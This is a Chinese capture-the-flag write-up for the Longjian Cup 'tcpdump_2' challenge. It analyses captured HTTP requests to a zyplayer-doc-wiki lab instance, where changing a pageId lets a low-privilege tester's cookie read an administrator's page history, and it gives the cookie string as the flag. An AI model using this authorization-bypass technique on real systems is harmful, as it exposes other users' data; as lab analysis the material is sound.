gradient

第二届陇剑杯tcpdump_2 writeup

rain

题目

攻击者发现软件存在越权漏洞

writeup

1.使用charles 设置http状态码 code 为200

发现2个数据包为:

POST /user/message/list HTTP/1.1
Host: 127.0.0.1:8080
Connection: keep-alive
Content-Length: 31
sec-ch-ua: “Not/A)Brand”;v=”99″, “Google Chrome”;v=”115″, “Chromium”;v=”115″
Accept: application/json, text/plain, */*
Content-Type: application/x-www-form-urlencoded
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
sec-ch-ua-platform: “Windows”
Origin: http://127.0.0.1:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8080/doc-wiki
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: accessToken=f412d3a0378d42439ee016b06ef3330c; zyplayertoken=f412d3a0378d42439ee016b06ef3330cQzw=; userid=1

sysType=2&pageNum=1&pageSize=20

返回包为:

{
“data”: [{
“acceptUserId”: 2,
“creationTime”: “2023-07-09 07:11:35”,
“dataDesc”: “foo”,
“dataId”: 4,
“id”: 18,
“msgContent”: “您修改了‘foo’”,
“msgStatus”: 1,
“msgType”: 4,
“operatorUserId”: 2,
“operatorUserName”: “测试人员”,
“sysType”: 2
}, {
“acceptUserId”: 2,
“creationTime”: “2023-07-09 07:11:33”,
“dataDesc”: “foo”,
“dataId”: 4,
“id”: 17,
“msgContent”: “您创建了‘foo’”,
“msgStatus”: 1,
“msgType”: 2,
“operatorUserId”: 2,
“operatorUserName”: “测试人员”,
“sysType”: 2
}],
“errCode”: 200,
“pageNum”: 1,
“pageSize”: 20,
“total”: 2,
“totalPage”: 1
}

创建了一个用户

数据包:

POST /user/info/selfInfo HTTP/1.1
Host: 127.0.0.1:8080
Connection: keep-alive
Content-Length: 0
sec-ch-ua: “Not/A)Brand”;v=”99″, “Google Chrome”;v=”115″, “Chromium”;v=”115″
Accept: application/json, text/plain, */*
Content-Type: application/x-www-form-urlencoded
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
sec-ch-ua-platform: “Windows”
Origin: http://127.0.0.1:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8080/doc-wiki
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: accessToken=f412d3a0378d42439ee016b06ef3330c; zyplayertoken=f412d3a0378d42439ee016b06ef3330cQzw=; userid=1

返回包:

{
“data”: {
“createUid”: 1,
“creationTime”: “2023-07-05 06:16:35”,
“delFlag”: 0,
“email”: “foobar@foobar.com”,
“id”: 2,
“sex”: 1,
“updateTime”: “2023-07-05 12:37:06”,
“userName”: “测试人员”,
“userNo”: “TMjpxFGQwD”
},
“errCode”: 200
}

管理员Cookie:accessToken=f412d3a0378d42439ee016b06ef3330c; zyplayertoken=f412d3a0378d42439ee016b06ef3330cQzw=; userid=1

测试人员Cookie:accessToken=f412d3a0378d42439ee016b06ef3330c; zyplayertoken=f412d3a0378d42439ee016b06ef3330cQzw=; userid=2

正常的数据包:

POST /zyplayer-doc-wiki/page/history/list HTTP/1.1
Host: 127.0.0.1:8080
Connection: keep-alive
Content-Length: 18
sec-ch-ua: “Not/A)Brand”;v=”99″, “Google Chrome”;v=”115″, “Chromium”;v=”115″
Accept: application/json, text/plain, */*
Content-Type: application/x-www-form-urlencoded
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
sec-ch-ua-platform: “Windows”
Origin: http://127.0.0.1:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8080/doc-wiki
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: accessToken=f412d3a0378d42439ee016b06ef3330c; zyplayertoken=f412d3a0378d42439ee016b06ef3330cQzw=; userid=2

pageId=3&pageNum=1

返回包:

{
“errCode”: 300,
“errMsg”: “您没有权限查看该空间的文章详情!”
}

存在问题的数据包

POST /zyplayer-doc-wiki/page/history/list HTTP/1.1
Host: 127.0.0.1:8080
Connection: keep-alive
Content-Length: 18
sec-ch-ua: “Not/A)Brand”;v=”99″, “Google Chrome”;v=”115″, “Chromium”;v=”115″
Accept: application/json, text/plain, */*
Content-Type: application/x-www-form-urlencoded
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
sec-ch-ua-platform: “Windows”
Origin: http://127.0.0.1:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8080/doc-wiki
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: accessToken=f412d3a0378d42439ee016b06ef3330c; zyplayertoken=f412d3a0378d42439ee016b06ef3330cQzw=; userid=2

pageId=2&pageNum=1

返回包:

{
“data”: [{
“createTime”: “2023-07-05 12:32:24”,
“createUserId”: 1,
“createUserName”: “系统管理员”,
“id”: 12,
“pageId”: 2
}, {
“createTime”: “2023-07-05 12:28:09”,
“createUserId”: 1,
“createUserName”: “系统管理员”,
“id”: 7,
“pageId”: 2
}, {
“createTime”: “2023-07-05 12:11:40”,
“createUserId”: 1,
“createUserName”: “系统管理员”,
“id”: 6,
“pageId”: 2
}, {
“createTime”: “2023-07-05 12:11:36”,
“createUserId”: 1,
“createUserName”: “系统管理员”,
“id”: 5,
“pageId”: 2
}],
“errCode”: 200,
“pageNum”: 1,
“pageSize”: 30,
“total”: 0,
“totalPage”: 0
}

此处使用的Cookie 是测试人员的Cookie

所以本次题目的flag为accessToken=f412d3a0378d42439ee016b06ef3330c; zyplayertoken=f412d3a0378d42439ee016b06ef3330cQzw=; userid=2

 

Leave a Comment